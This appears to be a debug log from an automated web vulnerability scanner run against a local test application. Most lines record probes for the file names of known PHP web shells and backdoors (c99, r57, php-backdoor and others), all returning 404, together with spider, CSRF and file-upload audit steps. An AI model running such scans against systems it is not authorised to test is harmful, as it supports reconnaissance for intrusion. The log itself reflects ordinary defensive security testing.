CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 3. [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=311,from_cache=0,grep=0,rtt=0.06,did=i7uBkgYg) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=314,from_cache=0,grep=1,rtt=0.13,did=iXoUgwiy) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/offlinemanifest returned HTTP code "404" (id=313,from_cache=0,grep=1,rtt=0.29,did=hvxXYdNl) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/gears_config.gears returned HTTP code "404" (id=310,from_cache=0,grep=1,rtt=0.11,did=LNZiqVMl) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/NCC-Shell.php returned HTTP code "404" (id=312,from_cache=0,grep=1,rtt=0.05,did=oJo9gpaw) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.rar returned HTTP code "404" (id=315,from_cache=0,grep=1,rtt=0.16,did=3yaYx3My) [Wed Feb 12 09:36:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4. [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/cachemanifest.json returned HTTP code "404" (id=318,from_cache=0,grep=1,rtt=0.02,did=GAM2JSpG) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/iMHaPFtp.php returned HTTP code "404" (id=317,from_cache=0,grep=1,rtt=0.06,did=EQZjHEIC) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/php-backdoor.php returned HTTP code "404" (id=316,from_cache=0,grep=1,rtt=0.09,did=UitwIPXF) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/matamu.php returned HTTP code "404" (id=320,from_cache=0,grep=1,rtt=0.10,did=ZVPk8Kz4) [Wed Feb 12 09:36:27 2020 - debug] Updating socket timeout for localhost from 3.99 to 3.00 seconds [Wed Feb 12 09:36:27 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:vWjUqtnn) [Wed Feb 12 09:36:27 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:27 2020 - debug] Raising HTTP error "CHECKIN" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:vWjUqtnn). [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/cmd.php returned HTTP code "404" (id=321,from_cache=0,grep=1,rtt=0.08,did=oWLzlL4v) [Wed Feb 12 09:36:27 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:2 / max:50 / total:49) [Wed Feb 12 09:36:27 2020 - debug] Connections with more in use time: (859514ff2302e122, 0.09 sec) (5aa0b4376f902084, 0.03 sec) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/site_manifest.php returned HTTP code "404" (id=319,from_cache=0,grep=1,rtt=0.15,did=oh82kvQc) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/gearsconfig.php returned HTTP code "404" (id=322,from_cache=0,grep=1,rtt=0.22,did=qUbTOsuN) [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 5. [Wed Feb 12 09:36:27 2020 - debug] user_dir.discover(did="O0hJZvrR",uri="http://localhost:9090/") took 12.58s to run [Wed Feb 12 09:36:27 2020 - debug] wsdl_finder.discover(http://localhost:9090/, did=FOctPWve) [Wed Feb 12 09:36:27 2020 - debug] [wsdl_finder] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/mysql_tool.php returned HTTP code "404" (id=323,from_cache=0,grep=1,rtt=0.25,did=AGEum8il) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/cybershell.php returned HTTP code "404" (id=326,from_cache=0,grep=1,rtt=0.18,did=ouYSS00W) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/lamashell.php returned HTTP code "404" (id=324,from_cache=0,grep=1,rtt=0.26,did=MgcfJ88Y) [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 6. [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/c99_PSych0.php returned HTTP code "404" (id=325,from_cache=0,grep=1,rtt=0.05,did=67PjNb3Z) [Wed Feb 12 09:36:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 167, 'reject-seen-url': 36, 'reject-out-of-scope': 4, 'accept': 43} [Wed Feb 12 09:36:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 167, 'reject-seen-url': 36, 'reject-out-of-scope': 4, 'accept': 43} [Wed Feb 12 09:36:27 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:at79U8jZ) [Wed Feb 12 09:36:27 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:27 2020 - debug] Raising HTTP error "*" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:at79U8jZ). [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/Crystal.php returned HTTP code "404" (id=328,from_cache=0,grep=1,rtt=0.06,did=ENqWMveD) [Wed Feb 12 09:36:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 167, 'reject-seen-url': 36, 'reject-out-of-scope': 4, 'accept': 43} [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/accept_language.php returned HTTP code "404" (id=329,from_cache=0,grep=1,rtt=0.10,did=2FcOlNue) [Wed Feb 12 09:36:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 167, 'reject-seen-url': 36, 'reject-out-of-scope': 4, 'accept': 43} [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/c99_locus7s.php returned HTTP code "404" (id=327,from_cache=0,grep=1,rtt=0.12,did=N73ZhSmq) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/ru24_post_sh.php returned HTTP code "404" (id=330,from_cache=0,grep=1,rtt=0.12,did=u78H0P49) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/gears-config returned HTTP code "404" (id=331,from_cache=0,grep=1,rtt=0.06,did=zW2elTxA) [Wed Feb 12 09:36:27 2020 - debug] Will increase timeout to 3.99 seconds after HTTP socket error (did:Y0IhAE2b) [Wed Feb 12 09:36:27 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.99 seconds [Wed Feb 12 09:36:27 2020 - debug] Raising HTTP error "CONNECT" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:Y0IhAE2b). [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/r57_iFX.php returned HTTP code "404" (id=333,from_cache=0,grep=1,rtt=0.07,did=uPo5Fsth) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/gears-manifest.json returned HTTP code "404" (id=335,from_cache=0,grep=1,rtt=0.21,did=j8mgcj9a) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/offline_manifest.txt returned HTTP code "404" (id=336,from_cache=0,grep=1,rtt=0.31,did=D8s79Mxy) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/mysql.php returned HTTP code "404" (id=332,from_cache=0,grep=1,rtt=0.05,did=sO6IT1Qs) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/gearsconfig.gears returned HTTP code "404" (id=337,from_cache=0,grep=1,rtt=0.25,did=2wydUMNh) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/pws.php returned HTTP code "404" (id=334,from_cache=0,grep=1,rtt=0.05,did=sEEbSjnJ) [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 7. [Wed Feb 12 09:36:27 2020 - debug] localhost:9090 connection pool stats (free:39 / in_use:11 / max:50 / total:50) [Wed Feb 12 09:36:27 2020 - debug] Connections with more in use time: (fe7e87f27a03e2ee, 0.09 sec) (859514ff2302e122, 0.07 sec) (8e309178b5b40c35, 0.06 sec) (5aa0b4376f902084, 0.06 sec) (2209cc403a0c5f20, 0.05 sec) [Wed Feb 12 09:36:27 2020 - debug] GET http://localhost:9090/simple-backdoor.php returned HTTP code "404" (id=338,from_cache=0,grep=1,rtt=0.14,did=R5dZBDyV) [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 8. [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 9. [Wed Feb 12 09:36:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 10. [Wed Feb 12 09:36:28 2020 - debug] CHECKOUT http://localhost:9090/ returned HTTP code "404" (id=340,from_cache=0,grep=1,rtt=0.09,did=2ISZS2nm) [Wed Feb 12 09:36:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 11. [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/rootshell.php returned HTTP code "404" (id=339,from_cache=0,grep=1,rtt=0.05,did=w8j3ELlr) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/Private-i3lue.php returned HTTP code "404" (id=349,from_cache=0,grep=1,rtt=0.10,did=KCX1U9Gt) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/manifest.json returned HTTP code "404" (id=342,from_cache=0,grep=1,rtt=0.24,did=mdq9mvnw) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/c99_madnet.php returned HTTP code "404" (id=343,from_cache=0,grep=1,rtt=0.22,did=huhd59rs) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/c99_w4cking.php returned HTTP code "404" (id=347,from_cache=0,grep=1,rtt=0.28,did=by6XW5zq) [Wed Feb 12 09:36:28 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=31 returned HTTP code "200" (id=341,from_cache=0,grep=0,rtt=3.40,did=ENvrDM8n) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/gfs_sh.php returned HTTP code "404" (id=350,from_cache=0,grep=1,rtt=0.35,did=Fjx22Hh5) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/r57_Mohajer22.php returned HTTP code "404" (id=348,from_cache=0,grep=1,rtt=0.36,did=yk2dE9Nd) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/Dx.php returned HTTP code "404" (id=351,from_cache=0,grep=1,rtt=0.26,did=2YouYTUb) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/cache-manifest.php returned HTTP code "404" (id=352,from_cache=0,grep=1,rtt=0.38,did=tHp9UZhX) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/ctt_sh.php returned HTTP code "404" (id=345,from_cache=0,grep=1,rtt=0.29,did=CDTi05zb) [Wed Feb 12 09:36:28 2020 - debug] GET http://localhost:9090/c99.php returned HTTP code "404" (id=356,from_cache=0,grep=1,rtt=0.38,did=Id06IN6Y) [Wed Feb 12 09:36:29 2020 - debug] url_fuzzer.discover(did="WPPCljOO",uri="http://localhost:9090/") took 10.40s to run [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/PHPJackal.php returned HTTP code "404" (id=354,from_cache=0,grep=1,rtt=0.34,did=iY173L7h) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/elarn returned HTTP code "404" (id=359,from_cache=0,grep=0,rtt=0.30,did=i7uBkgYg) [Wed Feb 12 09:36:29 2020 - debug] Received response for 404 URL http://localhost:9090/elarn (id:359, did:i7uBkgYg, len:144) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/phpshell.php returned HTTP code "404" (id=346,from_cache=0,grep=1,rtt=0.27,did=Um2bSgkF) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/ironshell.php returned HTTP code "404" (id=355,from_cache=0,grep=1,rtt=0.42,did=TOrji0NJ) [Wed Feb 12 09:36:29 2020 - debug] wordpress_enumerate_users.discover(http://localhost:9090/, did=H0d783y7) [Wed Feb 12 09:36:29 2020 - debug] [wordpress_enumerate_users] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:29 2020 - debug] Will increase timeout to 4.39 seconds after HTTP socket error (did:SzxUtG5W) [Wed Feb 12 09:36:29 2020 - debug] Updating socket timeout for localhost from 3.99 to 4.39 seconds [Wed Feb 12 09:36:29 2020 - debug] Raising HTTP error "LABEL" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:SzxUtG5W). [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/load_shell.php returned HTTP code "404" (id=357,from_cache=0,grep=1,rtt=0.36,did=SCBRshOZ) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/nstview.php returned HTTP code "404" (id=353,from_cache=0,grep=1,rtt=0.13,did=ACnzzXCp) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/zacosmall.php returned HTTP code "404" (id=358,from_cache=0,grep=1,rtt=0.31,did=CcA0ptDJ) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/sitemanifest.php returned HTTP code "404" (id=344,from_cache=0,grep=1,rtt=0.24,did=YZPVvvBF) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/r57_kartal.php returned HTTP code "404" (id=361,from_cache=0,grep=1,rtt=0.17,did=Z2nIM3aT) [Wed Feb 12 09:36:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 191, 'reject-seen-url': 37, 'reject-out-of-scope': 4, 'accept': 43} [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/NetworkFileManagerPHP.php returned HTTP code "404" (id=360,from_cache=0,grep=1,rtt=0.11,did=v0RvTTsy) [Wed Feb 12 09:36:29 2020 - debug] GET http://localhost:9090/c100shell.php returned HTTP code "404" (id=364,from_cache=0,grep=1,rtt=0.06,did=LvTsPMPs) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/Uploader.php returned HTTP code "404" (id=366,from_cache=0,grep=1,rtt=0.10,did=Zu99xjZx) [Wed Feb 12 09:36:30 2020 - debug] "http://localhost:9090/learn" (id:311, code:200, len:10863, did:i7uBkgYg) is NOT a 404 [known 404 with ID 359 uses 404 code] [Wed Feb 12 09:36:30 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn" at "http://localhost:9090/" [Wed Feb 12 09:36:30 2020 - debug] web_spider.discover(did="wKQcq2el",uri="http://localhost:9090/") took 9.05s to run [Wed Feb 12 09:36:30 2020 - debug] web_diff.discover(http://localhost:9090/, did=PoWJLtBs) [Wed Feb 12 09:36:30 2020 - debug] [web_diff] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:30 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn" [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/gearsmanifest.json returned HTTP code "404" (id=369,from_cache=0,grep=1,rtt=0.12,did=7NouXT5W) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/offlinemanifest.txt returned HTTP code "404" (id=363,from_cache=0,grep=1,rtt=0.08,did=G5080n4F) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/r57.php returned HTTP code "404" (id=362,from_cache=0,grep=1,rtt=0.05,did=PJKbi9Ql) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/locus.php returned HTTP code "404" (id=365,from_cache=0,grep=1,rtt=0.28,did=5WMuJtnV) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/c99shell.php returned HTTP code "404" (id=367,from_cache=0,grep=1,rtt=0.41,did=7w9rUkpz) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/stresbypass.php returned HTTP code "404" (id=368,from_cache=0,grep=1,rtt=0.07,did=ay6nBLCV) [Wed Feb 12 09:36:30 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:3 / max:50 / total:50) [Wed Feb 12 09:36:30 2020 - debug] Connections with more in use time: (859514ff2302e122, 0.20 sec) (f48c7d0502b1c449, 0.04 sec) (8e309178b5b40c35, 0.00 sec) [Wed Feb 12 09:36:30 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn" [Wed Feb 12 09:36:30 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn" [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=371,from_cache=1,grep=1,rtt=0.18,did=zkIoMCM2) [Wed Feb 12 09:36:30 2020 - debug] wordpress_enumerate_users.discover(did="H0d783y7",uri="http://localhost:9090/") took 0.59s to run [Wed Feb 12 09:36:30 2020 - debug] dwsync_xml.discover(http://localhost:9090/, did=h9FfD8t3) [Wed Feb 12 09:36:30 2020 - debug] [dwsync_xml] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/backupsql.php returned HTTP code "404" (id=370,from_cache=0,grep=1,rtt=0.19,did=NYFKeBpg) [Wed Feb 12 09:36:30 2020 - debug] PROPFIND http://localhost:9090/ returned HTTP code "404" (id=374,from_cache=0,grep=1,rtt=0.05,did=pZtgbnQn) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/PHANTASMA.php returned HTTP code "404" (id=373,from_cache=0,grep=1,rtt=0.30,did=QumCe23X) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/w4k.php returned HTTP code "404" (id=380,from_cache=0,grep=1,rtt=0.13,did=ZfHT2dpx) [Wed Feb 12 09:36:30 2020 - debug] GET http://localhost:9090/sosyete.php returned HTTP code "404" (id=377,from_cache=0,grep=1,rtt=0.04,did=u9AQjWa5) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/liz0zim.php returned HTTP code "404" (id=378,from_cache=0,grep=1,rtt=0.12,did=paOdRJSF) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/zaco.php returned HTTP code "404" (id=372,from_cache=0,grep=1,rtt=0.05,did=HoAW86en) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/heykir.php returned HTTP code "404" (id=375,from_cache=0,grep=1,rtt=0.15,did=Bd5CzZCH) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/avent.php returned HTTP code "404" (id=381,from_cache=0,grep=1,rtt=0.18,did=GG8qbZVx) [Wed Feb 12 09:36:31 2020 - debug] pykto.discover(http://localhost:9090/, did=oflILjS2) [Wed Feb 12 09:36:31 2020 - debug] [pykto] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/dx.php returned HTTP code "404" (id=379,from_cache=0,grep=1,rtt=0.14,did=WhOtdR5W) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/w4cking.php returned HTTP code "404" (id=386,from_cache=0,grep=1,rtt=0.23,did=8BWFK9xH) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/xx.php returned HTTP code "404" (id=376,from_cache=1,grep=1,rtt=0.48,did=09Gbi0nC) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/mysql2.php returned HTTP code "404" (id=384,from_cache=0,grep=1,rtt=0.14,did=cCM0rXbF) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/spybypass.php returned HTTP code "404" (id=382,from_cache=0,grep=1,rtt=0.20,did=DXUagZ94) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/PHPRemoteView.php returned HTTP code "404" (id=383,from_cache=0,grep=1,rtt=0.24,did=xoI4LONX) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/safemod.php returned HTTP code "404" (id=388,from_cache=0,grep=1,rtt=0.15,did=xkdAmPPl) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/nshell.php returned HTTP code "404" (id=385,from_cache=0,grep=1,rtt=0.18,did=h6eLf6Bf) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/locus7s.php returned HTTP code "404" (id=391,from_cache=0,grep=1,rtt=0.29,did=uJQ6b7ko) [Wed Feb 12 09:36:31 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:31 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:6 / max:50 / total:51) [Wed Feb 12 09:36:31 2020 - debug] Connections with more in use time: (859514ff2302e122, 0.17 sec) (2209cc403a0c5f20, 0.16 sec) (60c911515a0e8ec0, 0.12 sec) (ee57bf4e9093aa89, 0.09 sec) (cd9918a2d17819fb, 0.05 sec) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/jackal.php returned HTTP code "404" (id=387,from_cache=0,grep=1,rtt=0.20,did=xsJ4pmZt) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/w3k.php returned HTTP code "404" (id=392,from_cache=0,grep=1,rtt=0.12,did=AyMK1wdz) [Wed Feb 12 09:36:31 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=41 returned HTTP code "200" (id=389,from_cache=0,grep=0,rtt=0.71,did=EGK69W71) [Wed Feb 12 09:36:31 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: D6Xw7iBP) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/pHpINJ.php returned HTTP code "404" (id=390,from_cache=0,grep=1,rtt=0.25,did=DHyKOkaZ) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/c100.php returned HTTP code "404" (id=395,from_cache=0,grep=1,rtt=0.13,did=ysvYMG26) [Wed Feb 12 09:36:31 2020 - debug] Will increase timeout to 4.83 seconds after HTTP socket error (did:e1kkAPtp) [Wed Feb 12 09:36:31 2020 - debug] Updating socket timeout for localhost from 4.39 to 4.83 seconds [Wed Feb 12 09:36:31 2020 - debug] Raising HTTP error "SPACEJUMP" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:e1kkAPtp). [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/simple_cmd.php returned HTTP code "404" (id=394,from_cache=0,grep=1,rtt=0.09,did=GFuO0pv4) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/safe0ver.php returned HTTP code "404" (id=393,from_cache=0,grep=1,rtt=0.10,did=okE13GFF) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/cod3rz.php returned HTTP code "404" (id=399,from_cache=0,grep=1,rtt=0.22,did=oaRAq18G) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/cod3r.php returned HTTP code "404" (id=396,from_cache=0,grep=1,rtt=0.21,did=xL1VmFp6) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/php-include-w-shell.php returned HTTP code "404" (id=397,from_cache=0,grep=1,rtt=0.08,did=PzGX7TOd) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/h4x0r.php returned HTTP code "404" (id=398,from_cache=0,grep=1,rtt=0.13,did=IXhC0WF3) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/filesInCache.txt returned HTTP code "404" (id=300,from_cache=0,grep=1,rtt=0.29,did=aCezj2Cp) [Wed Feb 12 09:36:31 2020 - debug] Updating socket timeout for localhost from 4.83 to 3.00 seconds [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/locu.php returned HTTP code "404" (id=402,from_cache=0,grep=1,rtt=0.44,did=ncfFI0uq) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/worm.php returned HTTP code "404" (id=405,from_cache=0,grep=1,rtt=0.24,did=JDgsiqsT) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/simattacker.php returned HTTP code "404" (id=401,from_cache=0,grep=1,rtt=0.18,did=lRnuIcze) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/erne.php returned HTTP code "404" (id=409,from_cache=0,grep=1,rtt=0.41,did=y7256Ji9) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/remview.php returned HTTP code "404" (id=410,from_cache=0,grep=1,rtt=0.26,did=ulSGwt6r) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/ekin0x.php returned HTTP code "404" (id=411,from_cache=0,grep=1,rtt=0.41,did=xkXJUDfL) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/nst.php returned HTTP code "404" (id=404,from_cache=0,grep=1,rtt=0.15,did=MhxFL1ox) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=407,from_cache=0,grep=0,rtt=0.22,did=D6Xw7iBP) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/myshell.php returned HTTP code "404" (id=414,from_cache=0,grep=1,rtt=0.22,did=JSfazhL1) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/owned.php returned HTTP code "404" (id=408,from_cache=0,grep=1,rtt=0.18,did=4kAqNVMc) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/winshell.php returned HTTP code "404" (id=406,from_cache=0,grep=1,rtt=0.19,did=RSfURl8t) [Wed Feb 12 09:36:31 2020 - debug] GET http://localhost:9090/phpbypass.php returned HTTP code "404" (id=415,from_cache=0,grep=1,rtt=0.18,did=POIJIvN6) [Wed Feb 12 09:36:32 2020 - debug] GET https://raw.githubusercontent.com/vulnersCom/detect-rules/master/rules.json returned HTTP code "200" (id=403,from_cache=0,grep=1,rtt=16.50,did=q0uut9Zh) [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/x.php returned HTTP code "404" (id=413,from_cache=1,grep=1,rtt=0.67,did=FrQE9012) [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/perlcmd.cgi returned HTTP code "404" (id=417,from_cache=0,grep=1,rtt=0.11,did=sZr3B6ez) [Wed Feb 12 09:36:32 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: D6Xw7iBP) [Wed Feb 12 09:36:32 2020 - debug] detailed._login() took 0.98s to run [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/fatal.php returned HTTP code "404" (id=416,from_cache=0,grep=1,rtt=0.30,did=P9kfskmF) [Wed Feb 12 09:36:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 238, 'reject-seen-url': 39, 'reject-out-of-scope': 5, 'accept': 43} [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/xxx.php returned HTTP code "404" (id=412,from_cache=1,grep=1,rtt=0.15,did=Qy6uSDHN) [Wed Feb 12 09:36:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 238, 'reject-seen-url': 39, 'reject-out-of-scope': 5, 'accept': 43} [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/sql.php returned HTTP code "404" (id=418,from_cache=0,grep=1,rtt=0.10,did=Xwi1cPy8) [Wed Feb 12 09:36:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 238, 'reject-seen-url': 39, 'reject-out-of-scope': 5, 'accept': 43} [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=419,from_cache=0,grep=0,rtt=0.14,did=YxBaSPLr) [Wed Feb 12 09:36:32 2020 - debug] file_upload.audit(did="jjmCwnRz", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:32 2020 - debug] file_upload.audit(did="jjmCwnRz",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:32 2020 - debug] SUBSCRIBE http://localhost:9090/ returned HTTP code "404" (id=420,from_cache=0,grep=1,rtt=0.17,did=S9yJpfcR) [Wed Feb 12 09:36:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 238, 'reject-seen-url': 39, 'reject-out-of-scope': 5, 'accept': 43} [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/shell.pl returned HTTP code "404" (id=421,from_cache=0,grep=1,rtt=0.13,did=OzC1pbGU) [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/shell.cgi returned HTTP code "404" (id=422,from_cache=0,grep=1,rtt=0.05,did=6LWo9xnO) [Wed Feb 12 09:36:32 2020 - debug] csrf.audit(did="mItJwN62", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:32 2020 - debug] csrf.audit(did="mItJwN62",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/dc.php returned HTTP code "404" (id=423,from_cache=0,grep=1,rtt=0.16,did=GYoPbT32) [Wed Feb 12 09:36:32 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:3 / max:50 / total:51) [Wed Feb 12 09:36:32 2020 - debug] Connections with more in use time: (859514ff2302e122, 0.10 sec) (f48c7d0502b1c449, 0.10 sec) 